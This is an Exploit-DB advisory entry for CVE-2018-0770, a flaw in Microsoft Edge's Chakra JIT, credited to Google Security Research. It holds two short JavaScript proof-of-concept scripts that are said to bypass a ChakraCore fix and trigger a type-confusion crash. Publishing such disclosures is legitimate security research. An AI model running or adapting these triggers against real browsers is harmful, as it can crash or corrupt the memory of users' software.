Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)

EDB-ID: 44075
Author: Google Security Research
Published: 2018-02-15
CVE: CVE-2018-0770
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a 

The following two cases will bypass the fix.

1:
function opt() {
let obj = new Number(2.3023e-320);
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();

2:
function opt() {
let obj = '2.3023e-320';
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();

Related Posts